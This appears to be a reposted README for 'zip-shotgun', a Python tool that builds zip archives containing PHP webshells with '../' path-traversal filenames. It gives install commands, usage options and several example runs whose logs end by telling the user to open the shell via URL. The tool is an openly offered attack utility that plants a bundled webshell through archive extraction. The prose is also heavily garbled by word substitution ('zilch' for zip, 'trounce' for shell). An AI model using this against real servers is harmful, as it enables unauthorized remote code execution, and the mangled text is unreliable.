Zip Shotgun - Utility Script To Exam Naught File Upload Functionality (And Possible Extraction Of Naught Files) For Vulnerabilities
Utility script to exam zilch file upload functionality (and possible extraction of zilch files) for vulnerabilities. Idea for this script comes from this post service on Silent Signal Techblog - Compressed File Upload And Command Execution together with from OWASP - Test Upload of Malicious Files
This script volition practice archive which contains files amongst "../" inwards filename. When extracting this could crusade files to live on extracted to preceding directories. It tin hand the sack let assailant to extract shells to directories which tin hand the sack live on accessed from spider web browser.
Default webshell is wwwolf's PHP spider web trounce together with all the credit for it goes to WhiteWinterWolf. Source is available HERE
Installation
- Install using Python pip
pip install zip-shotgun --upgrade
- Clone git repository together with install
git clone https://github.com/jpiechowka/zip-shotgun.git
Execute from root directory of the cloned repository (where setup.py file is located)
pip install . --upgrade
Usage together with options
Usage: zip-shotgun [OPTIONS] OUTPUT_ZIP_FILE Options: --version Show the version together with exit. -c, --directories-count INTEGER Count of how many directories to larn dorsum within the zilch file (e.g iii agency that iii files volition live on added to the zip: shell.php, ../shell.php together with ../../shell.php where shell.php is the refer of the trounce you lot provided or randomly generated value [default: 16] -n, --shell-name TEXT Name of the trounce within the generated zilch file (e.g shell). If non provided it volition live on randomly generated. Cannot convey whitespaces -f, --shell-file-path PATH Influenza A virus subtype H5N1 file that contains code for the shell. If this selection is non provided wwwolf (https://github.com/WhiteWinterWolf/wwwolf- php-webshell) php trounce volition live on added instead. If refer is provided it volition live on added to the zilch amongst the provided refer or if non provided the refer volition live on randomly generated. --compress Enable compression. If this flag is ready archive volition live on compressed using DEFALTE algorithm amongst compression flat of 9. By default in that place is no compression applied. -h, --help Show this message together with exit.
Examples
- Using all default options
zip-shotgun archive.zip
Part of the script output
12/Dec/2018 Midweek 23:13:13 +0100 | INFO | Opening output zilch file: REDACTED\zip-shotgun\archive.zip 12/Dec/2018 Midweek 23:13:13 +0100 | WARNING | Shell refer was non provided. Generated random trounce name: BCsQOkiN23ur7OUj 12/Dec/2018 Midweek 23:13:13 +0100 | WARNING | Shell file was non provided. Using default wwwolf's webshell code 12/Dec/2018 Midweek 23:13:13 +0100 | INFO | Using default file extension for wwwolf's webshell: php 12/Dec/2018 Midweek 23:13:13 +0100 | INFO | --compress flag was NOT set. Archive volition live on uncompressed. Files volition live on alone stored. 12/Dec/2018 Midweek 23:13:13 +0100 | INFO | Writing file to the archive: BCsQOkiN23ur7OUj.php 12/Dec/2018 Midweek 23:13:13 +0100 | INFO | Setting total read/write/execute permissions (chmod 777) for file: BCsQOkiN23ur7OUj.php 12/Dec/2018 Midweek 23:13:13 +0100 | INFO | Writing file to the archive: ../BCsQOkiN23ur7OUj.php 12/Dec/2018 Midweek 23:13:13 +0100 | INFO | Setting total read/write/execute permissions (chmod 777) for file: ../BCsQOkiN23ur7OUj.php 12/Dec/2018 Midweek 23:13:13 +0100 | INFO | Writing file to the archive: ../../BCsQOkiN23ur7OUj.php 12/Dec/2018 Midweek 23:13:13 +0100 | INFO | Setting total read/write/execute permissions (chmod 777) for file: ../../BCsQOkiN23ur7OUj.php ... 12/Dec/2018 Midweek 23:13:13 +0100 | INFO | Finished. Try to access trounce using BCsQOkiN23ur7OUj.php inwards the URL
- Using default options together with enabling compression for archive file
zip-shotgun --compress archive.zip
Part of the script output
12/Dec/2018 Midweek 23:16:13 +0100 | INFO | Opening output zilch file: REDACTED\zip-shotgun\archive.zip 12/Dec/2018 Midweek 23:16:13 +0100 | WARNING | Shell refer was non provided. Generated random trounce name: 6B6NtnZXbXSubDCh 12/Dec/2018 Midweek 23:16:13 +0100 | WARNING | Shell file was non provided. Using default wwwolf's webshell code 12/Dec/2018 Midweek 23:16:13 +0100 | INFO | Using default file extension for wwwolf's webshell: php 12/Dec/2018 Midweek 23:16:13 +0100 | INFO | --compress flag was set. Archive volition live on compressed using DEFLATE algorithm amongst a flat of ix ... 12/Dec/2018 Midweek 23:16:13 +0100 | INFO | Finished. Try to access trounce using 6B6NtnZXbXSubDCh.php inwards the URL
- Using default options but changing the set out of directories to larn dorsum inwards the archive to 3
zip-shotgun --directories-count iii archive.zip
zip-shotgun -c iii archive.zip
The script volition write iii files inwards total to the archive
Part of the script output
12/Dec/2018 Midweek 23:17:43 +0100 | INFO | Opening output zilch file: REDACTED\zip-shotgun\archive.zip 12/Dec/2018 Midweek 23:17:43 +0100 | WARNING | Shell refer was non provided. Generated random trounce name: 34Bv9YoignMHgk2F 12/Dec/2018 Midweek 23:17:43 +0100 | WARNING | Shell file was non provided. Using default wwwolf's webshell code 12/Dec/2018 Midweek 23:17:43 +0100 | INFO | Using default file extension for wwwolf's webshell: php 12/Dec/2018 Midweek 23:17:43 +0100 | INFO | --compress flag was NOT set. Archive volition live on uncompressed. Files volition live on alone stored. 12/Dec/2018 Midweek 23:17:43 +0100 | INFO | Writing file to the archive: 34Bv9YoignMHgk2F.php 12/Dec/2018 Midweek 23:17:43 +0100 | INFO | Setting total read/write/execute permissions (chmod 777) for file: 34Bv9YoignMHgk2F.php 12/Dec/2018 Midweek 23:17:43 +0100 | INFO | Writing file to the archive: ../34Bv9YoignMHgk2F.php 12/Dec/2018 Midweek 23:17:43 +0100 | INFO | Setting total read/write/execute permissions (chmod 777) for file: ../34Bv9YoignMHgk2F.php 12/Dec/2018 Midweek 23:17:43 +0100 | INFO | Writing file to the archive: ../../34Bv9YoignMHgk2F.php 12/Dec/2018 Midweek 23:17:43 +0100 | INFO | Setting total read/write/execute permissions (chmod 777) for file: ../../34Bv9YoignMHgk2F.php 12/Dec/2018 Midweek 23:17:43 +0100 | INFO | Finished. Try to access trounce using 34Bv9YoignMHgk2F.php inwards the URL
- Using default options but providing trounce refer within archive together with enabling compression
Shell refer cannot convey whitespaces
zip-shotgun --shell-name custom-name --compress archive.zip
zip-shotgun -n custom-name --compress archive.zip
Name for trounce files within the archive volition live on ready to the ane provided past times the user.
Part of the script output
12/Dec/2018 Midweek 23:19:12 +0100 | INFO | Opening output zilch file: REDACTED\zip-shotgun\archive.zip 12/Dec/2018 Midweek 23:19:12 +0100 | WARNING | Shell file was non provided. Using default wwwolf's webshell code 12/Dec/2018 Midweek 23:19:12 +0100 | INFO | Using default file extension for wwwolf's webshell: php 12/Dec/2018 Midweek 23:19:12 +0100 | INFO | --compress flag was set. Archive volition live on compressed using DEFLATE algorithm amongst a flat of ix 12/Dec/2018 Midweek 23:19:12 +0100 | INFO | Writing file to the archive: custom-name.php 12/Dec/2018 Midweek 23:19:12 +0100 | INFO | Setting total read/write/execute permissions (chmod 777) for file: custom-name.php 12/Dec/2018 Midweek 23:19:12 +0100 | INFO | Writing file to the archive: ../custom-name.php 12/Dec/2018 Midweek 23:19:12 +0100 | INFO | Setting total read/write/execute permissions (chmod 777) for file: ../custom-name.php 12/Dec/2018 Midweek 23:19:12 +0100 | INFO | Writing file to the archive: ../../custom-name.php 12/Dec/2018 Midweek 23:19:12 +0100 | INFO | Setting total read/write/execute permissions (chmod 777) for file: ../../custom-name.php 12/Dec/2018 Midweek 23:19:12 +0100 | INFO | Writing file to the archive: ../../../custom-name.php ... 12/Dec/2018 Midweek 23:19:12 +0100 | INFO | Finished. Try to access trounce using custom-name.php inwards the URL
- Provide custom trounce file but job random refer within archive. Set directories count to 3
zip-shotgun --directories-count iii --shell-file-path ./custom-shell.php archive.zip
zip-shotgun -c iii -f ./custom-shell.php archive.zip
Shell code volition live on extracted from user provided file. Names within the archive volition live on randomly generated.
Part of the script output
12/Dec/2018 Midweek 23:21:37 +0100 | INFO | Opening output zilch file: REDACTED\zip-shotgun\archive.zip 12/Dec/2018 Midweek 23:21:37 +0100 | WARNING | Shell refer was non provided. Generated random trounce name: gqXRAJu1LD8d8VKf 12/Dec/2018 Midweek 23:21:37 +0100 | INFO | File containing trounce code was provided: REDACTED\zip-shotgun\custom-shell.php. Content volition live on added to archive 12/Dec/2018 Midweek 23:21:37 +0100 | INFO | Getting file extension from provided trounce file for reuse: php 12/Dec/2018 Midweek 23:21:37 +0100 | INFO | Opening provided file amongst trounce code: REDACTED\zip-shotgun\custom-shell.php 12/Dec/2018 Midweek 23:21:37 +0100 | INFO | --compress flag was NOT set. Archive volition live on uncompressed. Files volition live on alone stored. 12/Dec/2018 Midweek 23:21:37 +0100 | INFO | Writing file to the archive: gqXRAJu1LD8d8VKf.php 12/Dec/2018 Midweek 23:21:37 +0100 | INFO | Setting total read/write/execute permissions (chmod 777) for file: gqXRAJu1LD8d8VKf.php 12/Dec/2018 Midweek 23:21:37 +0100 | INFO | Writing file to the archive: ../gqXRAJu1LD8d8VKf.php 12/Dec/2018 Midweek 23:21:37 +0100 | INFO | Setting total read/write/execute permissions (chmod 777) for file: ../gqXRAJu1LD8d8VKf.php 12/Dec/2018 Midweek 23:21:37 +0100 | INFO | Writing file to the archive: ../../gqXRAJu1LD8d8VKf.php 12/Dec/2018 Midweek 23:21:37 +0100 | INFO | Setting total read/write/execute permissions (chmod 777) for file: ../../gqXRAJu1LD8d8VKf.php 12/Dec/2018 Midweek 23:21:37 +0100 | INFO | Finished. Try to access trounce using gqXRAJu1LD8d8VKf.php inwards the URL
- Provide custom trounce file together with ready trounce refer to relieve within archive. Set directories count to iii together with job compression
zip-shotgun --directories-count iii --shell-name custom-name --shell-file-path ./custom-shell.php --compress archive.zip
zip-shotgun -c iii -n custom-name -f ./custom-shell.php --compress archive.zip
Shell code volition live on extracted from user provided file. Names within the archive volition live on ready to user provided name.
Part of the script output
12/Dec/2018 Midweek 23:25:19 +0100 | INFO | Opening output zilch file: REDACTED\zip-shotgun\archive.zip 12/Dec/2018 Midweek 23:25:19 +0100 | INFO | File containing trounce code was provided: REDACTED\zip-shotgun\custom-shell.php. Content volition live on added to archive 12/Dec/2018 Midweek 23:25:19 +0100 | INFO | Getting file extension from provided trounce file for reuse: php 12/Dec/2018 Midweek 23:25:19 +0100 | INFO | Opening provided file amongst trounce code: REDACTED\zip-shotgun\custom-shell.php 12/Dec/2018 Midweek 23:25:19 +0100 | INFO | --compress flag was set. Archive volition live on compressed using DEFLATE algorithm amongst a flat of ix 12/Dec/2018 Midweek 23:25:19 +0100 | INFO | Writing file to the archive: custom-name.php 12/Dec/2018 Midweek 23:25:19 +0100 | INFO | Setting total read/write/execute permissions (chmod 777) for file: custom-name.php 12/Dec/2018 Midweek 23:25:19 +0100 | INFO | Writing file to the archive: ../custom-name.php 12/Dec/2018 Midweek 23:25:19 +0100 | INFO | Setting total read/write/execute permissions (chmod 777) for file: ../custom-name.php 12/Dec/2018 Midweek 23:25:19 +0100 | INFO | Writing file to the archive: ../../custom-name.php 12/Dec/2018 Midweek 23:25:19 +0100 | INFO | Setting total read/write/execute permissions (chmod 777) for file: ../../custom-name.php 12/Dec/2018 Midweek 23:25:19 +0100 | INFO | Finished. Try to access trounce using custom-name.php inwards the URL